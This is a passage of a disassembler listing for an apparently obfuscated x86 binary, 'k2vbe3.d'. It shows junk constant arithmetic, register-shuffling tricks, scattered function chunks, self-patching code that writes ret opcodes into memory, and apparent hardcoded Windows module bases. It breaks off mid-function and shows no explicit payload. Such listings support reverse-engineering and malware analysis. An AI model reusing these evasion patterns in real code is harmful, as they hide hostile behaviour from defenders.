sub_440EE3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	edx, esi
		jmp	sub_442745
; ---------------------------------------------------------------------------

loc_440EFE:				; CODE XREF: k2vbe3.d:0043F596j
		mov	eax, edx
		xchg	eax, [esp]
		push	edx
		push	8454307h
		pop	edx
		add	edx, 6C3691E9h
		and	edx, 0D92A6BFCh
		jmp	loc_4531A8

; =============== S U B	R O U T	I N E =======================================



sub_440F1B	proc near		; CODE XREF: sub_44B667:loc_444CA2p
					; k2vbe3.d:0044EAD2j
		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0C3h
		jmp	loc_454115
sub_440F1B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BF9

loc_440F27:				; CODE XREF: sub_454BF9+3j
		mov	eax, [esp+0]
		jmp	loc_444368
; END OF FUNCTION CHUNK	FOR sub_454BF9
; ---------------------------------------------------------------------------
		or	edx, 9E6FD018h
		mov	edx, ebx
		jmp	sub_44A8FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_440F3C:				; CODE XREF: sub_457DCA+313Fj
		cdq

loc_440F3D:				; CODE XREF: sub_457DCA:loc_4565A3j
		cmp	dword ptr [ebp-10h], 0
		setnz	byte ptr [ebp-5]
; END OF FUNCTION CHUNK	FOR sub_457DCA
; START	OF FUNCTION CHUNK FOR sub_444966

loc_440F45:				; CODE XREF: k2vbe3.d:0043E5CDj
					; sub_44D59D-9B7Ej ...
		push	ecx
		push	0AFE1C6D2h
		xchg	ebp, [esp+0]
		mov	ecx, ebp

loc_440F50:				; CODE XREF: sub_45AAEB:loc_44A514j
		pop	ebp
		jmp	loc_441BAE
; END OF FUNCTION CHUNK	FOR sub_444966

; =============== S U B	R O U T	I N E =======================================



sub_440F56	proc near		; DATA XREF: sub_454447-14388o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044CA53 SIZE 0000000B BYTES

		push	10h
		mov	eax, [ebp-8]
		jmp	loc_44CA53
sub_440F56	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_440F60:				; CODE XREF: sub_444297:loc_442405j
		push	0CA1A13A5h
		pop	eax
		and	eax, 26D8055Bh

loc_440F6C:				; CODE XREF: k2vbe3.d:00446BC0j
		jmp	loc_455222
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458BA9

loc_440F71:				; CODE XREF: sub_458BA9-EDD2j
					; sub_44B999:loc_451E23j
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44E481
		push	1C713823h
		pop	eax
		and	eax, 0F50DBCA1h
		add	eax, 0DBFCA7F3h
		jmp	loc_45A4F2
; END OF FUNCTION CHUNK	FOR sub_458BA9

; =============== S U B	R O U T	I N E =======================================



sub_440F92	proc near		; DATA XREF: k2vbe3.d:00453097o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F7A0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445114 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525E4 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A8F6 SIZE 00000005 BYTES

		push	esi
		mov	esi, edi
		xchg	esi, [esp+4+var_4]
		push	5F6A6380h
		pop	edi
		rol	edi, 1Ch
		and	edi, 912C62E8h
		jmp	loc_45A8F6
sub_440F92	endp

; ---------------------------------------------------------------------------

loc_440FAC:				; CODE XREF: k2vbe3.d:0044DCDBj
					; k2vbe3.d:0045BD2Ej
		and	ecx, 0F4388DF4h
		call	sub_4488E3

loc_440FB7:				; DATA XREF: sub_44B4E4-504Ao
		cmp	ds:dword_442828, 0
		jnz	loc_44195C
		jmp	loc_45552B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_440FC9:				; CODE XREF: sub_43D31B:loc_4506E3j
		jz	loc_4487A0
; END OF FUNCTION CHUNK	FOR sub_43D31B
; START	OF FUNCTION CHUNK FOR sub_448FCC

loc_440FCF:				; CODE XREF: sub_448FCC+9j
		jmp	loc_4455B6
; END OF FUNCTION CHUNK	FOR sub_448FCC
; ---------------------------------------------------------------------------
		ror	ebx, 1Ch
		mov	[ebx], edx
		jmp	loc_44879D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E9

loc_440FDE:				; CODE XREF: sub_4448E9+93B3j
		ror	ecx, 1Ah

loc_440FE1:				; CODE XREF: sub_4448E9:loc_44DC88j
		add	edi, 0AFE43481h
		xchg	edi, [esp+0]
		jmp	loc_451371
; END OF FUNCTION CHUNK	FOR sub_4448E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_440FEF:				; CODE XREF: sub_444EFA+12j
		pop	eax
		sub	eax, 0D8E04E0Dh
		add	eax, 0AE560FF3h
		rol	eax, 2
		and	eax, 9134693Dh
		jmp	loc_446F6A
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_44100A:				; CODE XREF: sub_44D9A7-E4BEj
		rol	edx, 10h
		xor	edx, 90050515h
		popf
		xchg	edx, [esp+0]
		jmp	loc_4498D7
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
		shr	ebp, 0Fh
		sbb	edi, 9F574783h
		jmp	sub_454407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_44102A:				; CODE XREF: sub_452D37+11j
		test	edx, 40h
		jmp	loc_454A39
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_441035:				; CODE XREF: sub_449DA2:loc_447C91j
		call	sub_45A051
; END OF FUNCTION CHUNK	FOR sub_449DA2
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44103A:				; CODE XREF: sub_43DFE1+16FDj
		jmp	loc_4409AC
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		cmp	edi, 3CEEB228h
		jmp	loc_459F7D
; ---------------------------------------------------------------------------

loc_44104A:				; CODE XREF: k2vbe3.d:loc_4592D2j
		push	9AAE53F8h
		pop	edi
		rol	edi, 1Fh
		and	edi, 76F74FE5h
		rol	edi, 5
		add	edi, 75641F68h
		call	sub_44987D

loc_441067:				; CODE XREF: k2vbe3.d:00453544j
		jmp	loc_448A47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44106C:				; CODE XREF: sub_45A323+8FDj
		jge	loc_444F71

loc_441072:				; CODE XREF: k2vbe3.d:00451429j
		jmp	loc_450147
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		jb	loc_444C78
		and	edi, 3AC5D362h
		rol	edi, 0Eh
		jmp	loc_45986D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AF54

loc_44108B:				; CODE XREF: sub_44AF54:loc_454786j
		jz	loc_442FDC
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_442FDC
		mov	edx, [ebx+ecx]
		xor	edx, [ebx+ecx+4]
		push	offset loc_442FD0
		jmp	nullsub_161
; END OF FUNCTION CHUNK	FOR sub_44AF54

; =============== S U B	R O U T	I N E =======================================



sub_4410AE	proc near		; DATA XREF: sub_43FE0A+2045o

; FUNCTION CHUNK AT 00442C79 SIZE 00000005 BYTES

		shl	eax, 3
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		shr	eax, 0Bh
		jmp	loc_442C79
sub_4410AE	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41E1EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_4410C5:				; CODE XREF: sub_4499EC-A40Bj
					; sub_4499EC:loc_442864j ...
		pop	edx
		js	loc_43CA22
		mov	eax, [esp+0]
		jmp	loc_44F861
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530B2

loc_4410D4:				; CODE XREF: sub_4530B2:loc_44B023j
		push	0B0E7F125h
		xchg	edi, [esp+8+var_8]
		mov	ebx, edi
		pop	edi
		jmp	loc_43E871
; END OF FUNCTION CHUNK	FOR sub_4530B2
; ---------------------------------------------------------------------------
		and	ebx, ecx
		jmp	sub_455895
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4410EB:				; CODE XREF: sub_44866A-505Fj
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_44086E
		call	sub_441109
		jnz	loc_44086E
		mov	eax, ebx
		jmp	loc_440870
; END OF FUNCTION CHUNK	FOR sub_44866A

; =============== S U B	R O U T	I N E =======================================



sub_441109	proc near		; CODE XREF: sub_44866A-7573p
					; sub_44866A-71A3p ...

; FUNCTION CHUNK AT 0043D500 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FB95 SIZE 00000006 BYTES

		mov	eax, [ebx+ecx]
		xor	eax, [ebx+ecx+4]
		jmp	loc_43D500
sub_441109	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_441115:				; CODE XREF: sub_44E0F6-FCBCj
		xchg	esi, [esp+0]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------

loc_44111D:				; CODE XREF: k2vbe3.d:00458391j
		push	ecx

; =============== S U B	R O U T	I N E =======================================



sub_44111E	proc near		; CODE XREF: sub_458899:loc_44E286p

; FUNCTION CHUNK AT 004463B3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_453347
		jmp	loc_4463B3
sub_44111E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44112C:				; DATA XREF: sub_456541-1A46o
		jnz	loc_459901
		mov	eax, [ebp+8]
		mov	eax, [eax-8]
		or	eax, 8
		jmp	loc_4598F3
; ---------------------------------------------------------------------------
		mov	ds:dword_41E110, eax
		lea	eax, nullsub_508
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_508
; ---------------------------------------------------------------------------

loc_441154:				; CODE XREF: k2vbe3.d:0045627Bj
		mov	eax, [esp]
		jmp	loc_4593AD
; ---------------------------------------------------------------------------

loc_44115C:				; CODE XREF: k2vbe3.d:0044AE02j
		add	eax, [ebp-4]
		call	sub_4402FA
		cmp	eax, [ebp-8]
		jnz	loc_44D604
		jmp	loc_44D706

; =============== S U B	R O U T	I N E =======================================



sub_441172	proc near		; CODE XREF: sub_44AD9D-AC85j
					; sub_440E8E+5p

; FUNCTION CHUNK AT 0043C848 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043CF79 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004450D0 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0044631A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448FFF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449BE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FFEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450A35 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004536C0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004573E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A750 SIZE 0000001D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, ds:dword_43FA64
		or	eax, eax
		jnz	loc_4536C0
		jmp	loc_449BE9
sub_441172	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_441189:				; CODE XREF: sub_44C1BD:loc_456655j
		jnz	loc_43DBA0
		shr	edi, 5
		and	ebp, edx
		jmp	loc_43DB92
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_288. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44119A:				; CODE XREF: k2vbe3.d:0044AC58j
		jmp	loc_453B7A
; ---------------------------------------------------------------------------

loc_44119F:				; CODE XREF: k2vbe3.d:loc_44A191j
		jmp	sub_44ADEC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4411A5:				; CODE XREF: k2vbe3.d:0043F589j
		jmp	locret_4592D7
; ---------------------------------------------------------------------------

loc_4411AA:				; CODE XREF: k2vbe3.d:loc_44E571j
		jnz	loc_457337
; START	OF FUNCTION CHUNK FOR sub_458725

loc_4411B0:				; CODE XREF: sub_458725-183A5j
		jmp	loc_45501A
; END OF FUNCTION CHUNK	FOR sub_458725
; ---------------------------------------------------------------------------
		test	ecx, ebx
		jmp	loc_45732B
; ---------------------------------------------------------------------------
dword_4411BC	dd 0			; DATA XREF: sub_441632+4o
					; k2vbe3.d:00444D3Eo ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDF

loc_4411C0:				; CODE XREF: sub_442DDF+Cj
		jmp	loc_44D6AD
; END OF FUNCTION CHUNK	FOR sub_442DDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_4411C5:				; CODE XREF: sub_443FC1-6017j
		jmp	loc_451C8B
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
		dw 0C57Ah
dword_4411CC	dd 77E60000h		; DATA XREF: sub_441632+Er
					; sub_441632:loc_44CDFDw ...
; ---------------------------------------------------------------------------

loc_4411D0:				; CODE XREF: k2vbe3.d:00458CC2j
		jmp	loc_44BAFE
; ---------------------------------------------------------------------------
		push	ebp
		add	bh, al

loc_4411D8:				; DATA XREF: sub_441632:loc_44CDEAo
					; sub_4436CE+17F98o
		mov	ch, 0B2h
		cmp	[ebx+65h], esi
		mov	cl, 33h
		enter	642Eh, 6Ch
		sbb	eax, [eax]
; START	OF FUNCTION CHUNK FOR sub_45960E

loc_4411E5:				; CODE XREF: sub_45960E-1F50j
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_45960E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4411EA:				; CODE XREF: sub_44C90E-21D0j
		jmp	loc_44459F
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		db 0FFh
byte_4411F0	db 1			; DATA XREF: sub_43C248+4w sub_44C6CAr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4565F8

loc_4411F1:				; CODE XREF: sub_4565F8+13j
		jmp	loc_44F646
; END OF FUNCTION CHUNK	FOR sub_4565F8
; ---------------------------------------------------------------------------
		dw 81DAh
		dd 1B647437h, 63322E63h, 6B75006Ch ; DATA XREF:	sub_44C6CA+10o
					; sub_451EB7+7o
dword_441204	dd 77F50000h		; DATA XREF: sub_451EB7+4A8Dw
					; sub_43C248:loc_45B73Er
; ---------------------------------------------------------------------------

loc_441208:				; CODE XREF: k2vbe3.d:00459437j
		jmp	sub_45B20A
; ---------------------------------------------------------------------------
		db 0B2h, 0E0h, 8Dh
dword_441210	dd 0			; DATA XREF: sub_4574AE:loc_441E85r
					; sub_44E59Dr ...
; ---------------------------------------------------------------------------

loc_441214:				; CODE XREF: k2vbe3.d:0045B81Cj
		jmp	nullsub_2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458B9B

loc_441219:				; CODE XREF: sub_458B9B-FC38j
		jmp	loc_44AAE5
; END OF FUNCTION CHUNK	FOR sub_458B9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_44121E:				; CODE XREF: sub_44866A-3231j
		jmp	loc_4414BB
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BCE

loc_441223:				; CODE XREF: sub_454BCE-15C4Bj
		jmp	nullsub_301
; END OF FUNCTION CHUNK	FOR sub_454BCE
; ---------------------------------------------------------------------------
dword_441228	dd 77E79F93h		; DATA XREF: sub_442DF0:loc_440599r
					; sub_442DF0+9DAFr ...
; ---------------------------------------------------------------------------

loc_44122C:				; CODE XREF: k2vbe3.d:0045349Dj
		jmp	loc_452B40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_441231:				; CODE XREF: sub_44662B:loc_444695j
		xor	eax, 1BBB7B14h
		rol	eax, 19h
		xor	eax, 0AB6B6EBFh
		push	edi
		pushf
		push	8522C5A4h
		pop	edi
		jmp	loc_445621
; ---------------------------------------------------------------------------

loc_44124D:				; CODE XREF: sub_44662B:loc_446ACAj
		jnb	loc_44AB21
		ror	ebp, 8
		xor	esi, eax
		xor	eax, 468A4823h
		jmp	loc_44D4E4
; END OF FUNCTION CHUNK	FOR sub_44662B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_441264:				; CODE XREF: sub_446CE6+Fj
		jmp	loc_4559A9
; END OF FUNCTION CHUNK	FOR sub_446CE6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_496. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_421. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44126B:				; CODE XREF: sub_445124-2DCBj
		jmp	loc_441BA8
; END OF FUNCTION CHUNK	FOR sub_445124
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_237. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_441271:				; CODE XREF: sub_457DCA-18BEDj
		jmp	loc_44F94E
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------

loc_441276:				; CODE XREF: k2vbe3.d:00452B55j
					; DATA XREF: sub_456471-2460o
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		ror	eax, 11h
		mov	ds:dword_44BD0C, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E71

loc_441286:				; CODE XREF: sub_440E71-35E9j
		jmp	loc_45AF98
; END OF FUNCTION CHUNK	FOR sub_440E71

; =============== S U B	R O U T	I N E =======================================



sub_44128B	proc near		; CODE XREF: k2vbe3.d:loc_44006Dp
					; sub_44B208:loc_440E5Cp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C0A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C5A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E465 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E889 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FAB1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440A3D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443487 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004443BA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A36A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A3B5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044DBE2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450979 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451E6E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004523F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453667 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045612C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00456A20 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C0A5 SIZE 0000001A BYTES

		jno	loc_440A3D
		jmp	sub_45B454
sub_44128B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	ecx, 13142F43h
		jmp	loc_45AE8C

; =============== S U B	R O U T	I N E =======================================



sub_4412A1	proc near		; CODE XREF: k2vbe3.d:00440396j
					; sub_440C7D+15172p

; FUNCTION CHUNK AT 004423B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D4D SIZE 0000000E BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_4553CC
		mov	ds:off_41E160, eax
		jmp	loc_4423B8
sub_4412A1	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4412B5	proc near		; DATA XREF: k2vbe3.d:00453210o

; FUNCTION CHUNK AT 0044FFF5 SIZE 00000005 BYTES

		call	sub_451759
		push	offset sub_45227C
		jmp	loc_44FFF5
sub_4412B5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_4412C4:				; CODE XREF: sub_459DA3:loc_446AB6j
		mov	edx, ebx
		xchg	edx, [esp+0]
		mov	ebx, ebp
		xchg	ebx, [esp+0]
		jmp	loc_43E222
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443795

loc_4412D3:				; CODE XREF: sub_443795-248Aj
		push	9135470Fh
		pop	esi
		sub	esi, 0EEE16EAFh
		add	esi, 5DF0789Ch
		xchg	esi, [esp+0]
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_443795
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_4412ED:				; CODE XREF: sub_44E2A4+D364j
		jnz	loc_4501D8
; END OF FUNCTION CHUNK	FOR sub_44E2A4
; START	OF FUNCTION CHUNK FOR sub_44F570

loc_4412F3:				; CODE XREF: sub_44F570+6j
		jmp	nullsub_92
; END OF FUNCTION CHUNK	FOR sub_44F570
; ---------------------------------------------------------------------------
		cmp	ebx, ebp
		jmp	loc_453266
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443795

loc_4412FF:				; CODE XREF: sub_443795:loc_45B215j
		mov	eax, [ebp-10h]
		push	eax
		mov	edx, eax
		call	sub_45B74D
		push	esi
		jmp	loc_4412D3
; END OF FUNCTION CHUNK	FOR sub_443795
; ---------------------------------------------------------------------------
		add	edx, ebp
		jmp	sub_457024
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F5B

loc_441317:				; CODE XREF: sub_443F5B+15j
		call	sub_43C82E

loc_44131C:				; CODE XREF: sub_450983-12EE6j
		push	offset loc_441501
		jmp	loc_446EFD
; END OF FUNCTION CHUNK	FOR sub_443F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_441326:				; CODE XREF: sub_454E69:loc_442721j
		mov	eax, edx
		pop	edx
		sub	eax, 8D4D3DA6h
		add	eax, 1DC0C987h
		or	eax, 0B208A46h
		call	sub_454AD4

loc_441340:				; CODE XREF: k2vbe3.d:00455902j
		jmp	loc_4437BD
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------

locret_441345:				; CODE XREF: k2vbe3.d:loc_442190j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456849

loc_441346:				; CODE XREF: sub_456849+Aj
		xchg	edx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_456849
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44134E:				; CODE XREF: sub_44471B:loc_44D0A4j
					; sub_44471B+89A0j
		sub	edi, 5F4707B5h
		add	edi, 7FAC27CBh
		xchg	edi, [esp+4+var_4]
		jmp	loc_443036
; END OF FUNCTION CHUNK	FOR sub_44471B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_352. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441363:				; CODE XREF: k2vbe3.d:0044FDFCj
		jmp	locret_447B04
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_502. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_441369:				; CODE XREF: sub_441D41+D7C5j
		jmp	loc_45696D
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C579

loc_44136E:				; CODE XREF: sub_44C579-2785j
		add	edi, 41A11A0Eh
		xchg	edi, [esp+8+var_8]
		jmp	loc_43EAD0
; END OF FUNCTION CHUNK	FOR sub_44C579
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_44137C:				; CODE XREF: sub_4471DC:loc_4473D1j
		call	sub_4553CC
		push	offset sub_447B4F
		jmp	loc_43FA17
; END OF FUNCTION CHUNK	FOR sub_4471DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429FF

loc_44138B:				; CODE XREF: sub_4429FF+6j
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jmp	loc_443E17
; END OF FUNCTION CHUNK	FOR sub_4429FF
; ---------------------------------------------------------------------------
		adc	edx, 30CFBEEEh

loc_4413A5:				; CODE XREF: k2vbe3.d:loc_44C901j
		jmp	loc_455044
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_286. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_4413AB:				; CODE XREF: sub_454F9F-1697j
		jmp	nullsub_144
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, ebx
		xchg	eax, [esp]
		push	0AB4CD7ACh
		pop	ebx
		rol	ebx, 1Ah
		jmp	loc_442C0C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_4413C5:				; CODE XREF: sub_441D41+6FEj
		jmp	nullsub_70
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_4413CA:				; CODE XREF: sub_44B912:loc_44B57Cj
		cmp	dword ptr [ebp-4], 0
		jz	loc_455177
		jmp	loc_44D272
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_4413D9:				; CODE XREF: k2vbe3.d:0045B1FFj
		xchg	edi, esi
		jmp	loc_4448FD
; ---------------------------------------------------------------------------
		mov	ds:off_41E204, eax
		lea	eax, loc_44D548
		mov	byte ptr [eax],	0C3h
		jmp	loc_4436F7

; =============== S U B	R O U T	I N E =======================================



sub_4413F4	proc near		; CODE XREF: sub_4198C0+4Ap
					; sub_4413F4+5j
					; DATA XREF: ...
		call	sub_441409
		jmp	ds:off_41E208
sub_4413F4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4561C3

loc_4413FF:				; CODE XREF: sub_4561C3-E7B2j
		jmp	nullsub_536
; END OF FUNCTION CHUNK	FOR sub_4561C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FAC

loc_441404:				; CODE XREF: sub_443FAC+10j
		jmp	loc_43F5AC
; END OF FUNCTION CHUNK	FOR sub_443FAC

; =============== S U B	R O U T	I N E =======================================



sub_441409	proc near		; CODE XREF: sub_4413F4p
					; sub_4537DB:loc_445631j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D2E2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D7D3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D9DD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043EE45 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440A5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445EED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446975 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044824A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00448B7A SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0044A7B1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B111 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044E2F8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044FB8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452405 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004537EA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004546E1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456518 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045890A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A0F7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A7BC SIZE 00000017 BYTES

		pop	edx
		jo	loc_4537EA
		mov	eax, [esp-4+arg_0]
		jmp	loc_452405
sub_441409	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_441418	proc near		; CODE XREF: sub_44E2A4+17j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044F46A SIZE 0000002B BYTES
